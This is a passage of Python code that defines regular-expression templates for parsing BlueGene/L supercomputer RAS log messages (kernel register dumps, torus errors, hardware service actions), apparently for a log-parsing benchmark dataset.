ido_proxy_has_been_started = "idoproxydb has been started: \$Name: .+? \$ Input parameters: -enableflush -loguserinfo db\.properties BlueGene1"
# ciodb has been restarted.
ciodb_has_been_restarted = "ciodb has been restarted\."
# mmcs_db_server has been started: ./mmcs_db_server --useDatabase BGL --dbproperties serverdb.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all
# mmcs_db_server has been started: ./mmcs_db_server --useDatabase BGL --dbproperties serverdb.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all --shutdown-timeout 30
# mmcs_db_server has been started: ./mmcs_db_server --useDatabase BGL --dbproperties db.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all
mmcs_db_server_started = "mmcs_db_server has been started: .+?/mmcs_db_server --useDatabase BGL --dbproperties .+?\.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all.*?"
# ciod: failed to read message prefix on control stream
ciod_failed_control_stream = "ciod: failed to read message prefix on control stream \(CioStream socket to 172\.16\.96\.116\:\d{5}"
# 1 L3 directory error(s) (dcr 0x0152) detected and corrected
l3_directory_errors_detected = "\d+? L3 directory error\(s\) \(dcr 0x0152\) detected and corrected"
# instruction address: 0x0000df30
instruction_address = "instruction address: 0x%s{8}"%hexchar
# machine check status register: 0x81000000
machine_check_status = "[mM]achine [cC]heck [Ss]tatus [Rr]egister: 0x%s{8}"%hexchar
# 1:1fefff30 2:1eeeeeee 3:00000000
general_purpose_registers ="(\d{1,2}:%s{8} ?){3,4}?"%(hexchar)
# lr:003625f0 cr:20000000 xer:00000002 ctr:0037f084
# - 1119454873 2005.06.22 R02-M1-N0-C:J12-U11 2005-06-22-08.41.13.453790 R02-M1-N0-C:J12-U11 RAS KERNEL INFO lr:0047ac04 cr:00000020 xer:20000002 ctr:00000000
special_purpose_registers = "lr:%s{8} cr:%s{8} xer:%s{8} ctr:%s{8}"%(hexchar,hexchar,hexchar,hexchar)
# 17 torus receiver x+ input pipe error(s) (dcr 0x02ec) detected and corrected
torus_reciever_error = "\d{1,10} torus receiver [xyz][\+\-] input pipe error\(s\) \(dcr 0x%s{4}\) detected and corrected.*?"%(hexchar)
# 1 torus sender y- retransmission error(s) (dcr 0x02f7) detected and corrected
torus_sender_corrected = "\d{1,8} torus sender [xyz][\+\-] retransmission error\(s\) \(dcr 0x%s{4}\) detected and corrected"%(hexchar)
# external input interrupt (unit=0x02 bit=0x0b): torus sender y+ retransmission error was corrected
torus_retransmission_corrected = "external input interrupt \(unit=0x%s{2} bit=0x%s{2}\): torus sender [xyz][\+-] retransmission error was corrected"%(hexchar,hexchar)
# Expected 10 active FanModules, but found 9 ( Found J300 J301 J302 J303 J304 J306 J307 J308 J309 ).
expected_x_fanmodules="Expected \d{1,2} active FanModules, but found \d{1,2} \( Found( .+?)+ \)\."
# data address: 0x4bffffa4
data_address = "data address: 0x%s{8}"%(hexchar)
# ciod: cpu 0 at treeaddr 925 sent unrecognized message 0xffffffff
ciod_unrecognized_message = "ciod: cpu 0 at treeaddr \d{2,5} sent unrecognized message 0xffffffff"
# ciod: for node 42, read continuation request but ioState is 0
ciod_read_continuation = "ciod: for node \d{1,3}, read continuation request but ioState is 0"
# ciod: Message code 2 is not 3 or 4294967295
ciod_message_code = "ciod: Message code \d is not \d{1,2} or 4294967295"
# machine check interrupt (bit=0x1d): L2 dcache unit data parity error
# machine check interrupt (bit=0x10): L2 dcache unit read return parity error
machine_check_interupt_l2 = "machine check interrupt \(bit=0x.+?\): L2 dcache unit data parity error"
machine_check_interupt_l2_cdu = "machine check interrupt \(bit=0x.+?\): L2 DCU read error"
# ciod: LOGIN chdir(/p/gb1/stella/RAPTOR/2183) failed: Input/output error
ciod_login_input_output = "ciod: LOGIN chdir\(/.+?\) failed: Input/output error"
# machine check interrupt \(bit=0x06\): L3 major internal error
machine_check_interupt_l3 = "machine check interrupt \(bit=0x06\): L3 major internal error"
# L3 global control register: 0x001249f0
l3_global_control_register = "L3 global control register: 0x%s{8}"%(hexchar)
# L3 ecc control register: 00000000
l3_ecc_control_register = "L3 ecc control register: %s{8}"%(hexchar)
# L3 ecc status register: 00000000
l3_ecc_status_register = "L3 ecc status register: %s{8}"%(hexchar)
# mmcs_server exited normally with exit code 13
mmcs_server_exited_normally = "mmcs_server exited normally with exit code \d{1,2}"
# HARDWARE WARNING PrepareForService is being done on this card(mLctn(R33-M1-ND), mCardSernum(203231503833343000000000594c31304b35303034303232), mLp(FF:F2:9F:16:BF:44:00:0D:60:E9:40:BB), mIp(10.3.0.80), mType(4)) by root
hardware_warning = "PrepareForService is being done on this card\(mLctn\(%s\), mCardSernum\(%s+?\), mLp\(.+?\), mIp\(%s\), mType\(4\)\) by root"%(nodeid3,hexchar,ip4address)
# HARDWARE WARNING PrepareForService shutting down NodeCard(mLctn(R33-M1-ND), mCardSernum(203231503833343000000000594c31304b35303034303232), mLp(FF:F2:9F:16:BF:44:00:0D:60:E9:40:BB), mIp(10.3.0.80), mType(4)) as part of Service Action 219
hardware_warning_shutdown = "PrepareForService shutting down NodeCard\(mLctn\(%s\), mCardSernum\(%s+?\), mLp\(.+?\), mIp\(%s\), mType\(4\)\) as part of Service Action \d{3}"%(nodeid3,hexchar,ip4address)
# PrepareForService is being done on this part \(mLctn\(R36-M1-NE\), mCardSernum\(203231503833343000000000594c31304b3433343231544b\), mLp\(FF:F2:9F:16:C9:63:00:0D:60:E9:36:9C\), mIp\(10.3.1.147\), mType\(4\)\) by root
prepare_for_service_on_this_part = ("PrepareForService is being done on this part \(mLctn\(%s\), "
"mCardSernum\(.+?\), mLp\(.+?\), mIp\(%s\), "
"mType\(\d\)\) by .*?")%(nodeid3, ip4address)
# PrepareForService is being done on this Midplane (mLctn(R07-M1), mCardSernum( 203937503631353900000000594c31304b34323635303343)) by root
# PrepareForService is being done on this Midplane (mLctn(R07-M1), mCardSernum( 203937503631353900000000594c31304b34323635303343)) by root
prepare_for_service_on_this_midplane = "PrepareForService is being done on this Midplane \(mLctn\(.+?\), mCardSernum\( .+?\)\) by .+?"
# DDR failing info register: 0x8f401000
ddr_failing_info_register = "DDR failing info register: 0x%s{8}"%(hexchar)
# symbol................15
symbol = "symbol................\d{1,2}"
# mask..................0x00
mask = "mask..................0x%s{2}"%(hexchar)
# 1 torus processor sram reception error\(s\) \(dcr 0x02fc\) detected and corrected
torus_sram_repetition = "\d+? torus processor sram reception error\(s\) \(dcr 0x02fc\) detected and corrected"
# ddr: Unable to steer rank=0, symbol=0 - rank is already steering symbol 2. Due to multiple symbols being over the correctable e
ddr_unable_to_steer_rank = "ddr: Unable to steer rank=0, symbol=\d{1,3} - rank is already steering symbol \d{1,3}. Due to multiple symbols being over the correctable? ?e?"
# ddr: Unable to steer rank=0, symbol=5 - rank is already steering symbol 4. Due to multiple symbols being over the correctable error threshold, consider replacing the card
ddr_unable_to_steer_rank_already_steering = "ddr: Unable to steer rank=0, symbol=\d{1,3} - rank is already steering symbol \d{1,3}. Due to multiple symbols being over the correctable error threshold, consider replacing the card"
"""
Logline patterns
"""
# according to https://jiemingzhu.github.io/pub/pjhe_dsn2016.pdf, should have 376 events
KNOWN_LOGLINE_PATTERN = [
r"^(-|LINKDISC) TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {prepare_for_service_on_this_midplane}$".format( prepare_for_service_on_this_midplane=prepare_for_service_on_this_midplane),
r"^(-|MASNORM) TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE {ciodb_exited_normally}$".format(ciodb_exited_normally=ciodb_exited_normally),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_01|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_01|UNKNOWN_LOCATION) NULL DISCOVERY WARNING Problem communicating with link card (ido|iDo machine) with LP of {LP_ADDRESS}, caught java.lang.IllegalStateException: while executing I2C Operation caught java.lang.RuntimeException: Communication error: \(DirectIDo for com.ibm.ido.DirectIDo object \[{LP_ADDRESS}@/{ip4andport} with image version \d+? and card type \d+?\] is in state = COMMUNICATION_ERROR, sequenceNumberIsOk = false, ExpectedSequenceNumber = \d+?, Reply Sequence Number = .+?, timedOut = true, retries = 200, timeout = 1000, Expected Op Command = 2, Actual Op Reply = -1, Expected Sync Command = .+?, Actual Sync Reply = .+?\)$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_01|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_01|UNKNOWN_LOCATION) {new_ido_chipset_inserted}$".format( new_ido_chipset_inserted=new_ido_chipset_inserted),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|NULL) DATE_TIME (NODE_ID_03|NULL) RAS MMCS ERROR idoproxydb hit ASSERT condition: ASSERT expression=.+? Source file=.+? Source line=\d+? Function=.+? .+?::.+?\)$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY ERROR Bad cable going into LinkCard \({hexchar}+?\) Jtag \(\d\) Port \(\w\) - \d+? bad wires".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY ERROR Missing reverse cable: Cable {nodeid3} \d \w \(J\d+?\) --> {nodeid3} \d \w \(J\d+?\) is present BUT the reverse cable {nodeid3} \d \w \(J\d+?\) --> {nodeid3} \d \w \(J\d+?\) is missing".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY INFO Node card VPD check: missing U\d+? node, VPD ecid {hexchar}+? in processor card slot J\d+?$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY (INFO|WARNING) Node card VPD check: U\d+? node in processor card slot J\d+? do not match. VPD ecid {hexchar}+?, found {hexchar}+?$".format(hexchar=hexchar),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY SEVERE Can not get assembly information for node card$",
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY SEVERE Problem communicating with service card, ido chip: {hexcharcol}+?\. java.io.IOException: Could not find EthernetSwitch on port:address \d+?:\d+?$".format(hexcharcol=hexcharcol, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY SEVERE {expected_x_fanmodules}$".format( expected_x_fanmodules=expected_x_fanmodules),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL (DISCOVERY|HARDWARE) (WARNING|SEVERE) (Node card|NodeCard) is not fully functional$",
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY WARNING Problem communicating with service card, ido chip: {hexcharcol}+?\. java.lang.IllegalStateException: IDo is not in functional state -- currently in state COMMUNICATION_ERROR$".format(hexcharcol=hexcharcol),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY WARNING this link card is not fully functional$".format(LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL HARDWARE SEVERE LinkCard is not fully functional$".format( LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL HARDWARE SEVERE LinkCard power module U\d+? is not accessible$".format( LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION|{rack_id}) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION|{rack_id}) NULL HARDWARE WARNING EndServiceAction \d\d\d performed upon {rack_id} by .+?$".format(rack_id=rack_id, ),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|{rack_id}|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|{rack_id}|UNKNOWN_LOCATION) NULL HARDWARE WARNING PrepareForService is being done on this rack \({rack_id}\) by .+?$".format(rack_id=rack_id, ),
r"^- TIME_STAMP SHORT_DATE - DATE_TIME 0 \(.+?\) iar {hex_address}, dear {hex_address} \(.+? RAS KERNEL INFO Kernel.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE - DATE_TIME nput interrupts, 0 microseconds max time in a cr RAS KERNEL INFO .+? total interrupts. .+? critical input interrupts. .+? microseconds total spent on critical input interrupts, .+? microseconds max time in a critical input interrupt.$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE - DATE_TIME RAS KERNEL FATAL Kill job \d\d\d\d\d timed out. Block freed.$",
r"^- TIME_STAMP SHORT_DATE - DATE_TIME time for a single instance of a correctable ddr. RAS KERNEL INFO .+? microseconds spent in the rbs signal handler during .+? calls. .+? microseconds was the maximum time for a single instance of a correctable ddr.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_01|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_01|UNKNOWN_LOCATION) NULL HARDWARE WARNING .+?IBM Part Number:.+?Vendor:.+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error creating node map from file .+?: .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error loading .+?: invalid or missing program image, .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error loading .+?: not a CNK program image$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error loading .+?: program image too big, .+? > .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: LOGIN open\(.+?\) failed: Permission denied$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL DCR 0x\w\w\w : {hex_address}$".format(hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL Torus non-recoverable error DCRs follow.$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: LOGIN chdir\(.+?\) failed: .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL [Cc]ore [Cc]onfiguration [Rr]egister.*?: {hex_address}$".format(hex_address=hex_address, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL [Gg]eneral [Pp]urpose [Rr]egisters:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL \d*?, max=\d+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL \d+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL address parity error..0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL auxiliary processor.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL byte ordering exception.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first DDR uncorrectable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first directory correctable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first directory uncorrectable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first EDRAM correctable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first EDRAM parity error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first EDRAM uncorrectable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture valid.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL CHECK_INITIAL_GLOBAL_INTERRUPT_VALUES$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL chip select...........0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL close EDRAM pages as soon as possible....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL command manager unit summary.....................0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL correctable error detected in directory [01]......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL correctable error detected in EDRAM bank [01].....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL correctable error.....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL critical input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL d-cache flush parity error........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL d-cache search parity error.......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data address space................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data read plb error...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data store interrupt caused by \w\w\w\w.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data write plb error..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL dbcr0={hex_address} dbsr={hex_address} ccr0={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR failing address register: {hex_address} {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR failing data registers: {hex_address} {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR failing info register: DDR Fail Info Register: {hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL ddrSize == .*? \|\| ddrSize == .*?$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL debug interrupt enable............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL debug wait enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable all access to cache directory....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable apu instruction broadcast........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable flagging of DDR UE's as major internal error.[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable speculative access...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable store gathering..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable trace broadcast..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable write lines 2:4..................[10]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL divide-by-zero exception.................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable divide-by-zero exceptions.........[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable inexact exceptions................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable invalid operation exceptions......[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable non-IEEE mode.....................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable overflow exceptions...............[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable underflow exceptions..............[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enabled exception summary................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Error sending packet on tree network, packet at address {eight_hex} is not aligned$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL exception summary........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL exception syndrome register: {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL external input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating point instr. enabled.....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating point operation....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Floating Point Registers:$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Floating Point Status and Control Register: {hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating pt ex mode 0 enable......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating pt ex mode 1 enable......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL force load/store alignment...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL fpr.+?={hex_address} {eight_hex} {eight_hex} {eight_hex}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL fraction inexact.........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL fraction rounded.........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL gister: machine state register: machine state register: machine state register: machine state register: machine state register:$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL guaranteed data cache block touch........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL guaranteed instruction cache block touch.[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL i-cache parity error..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL icache prefetch depth....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL icache prefetch threshold................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL imprecise machine check...........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL inexact exception........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL instruction address space.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL instruction plb error.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL interrupt threshold...0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(compare\)........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(Inf/Zero\).......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(Inf[-/]Inf\)........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
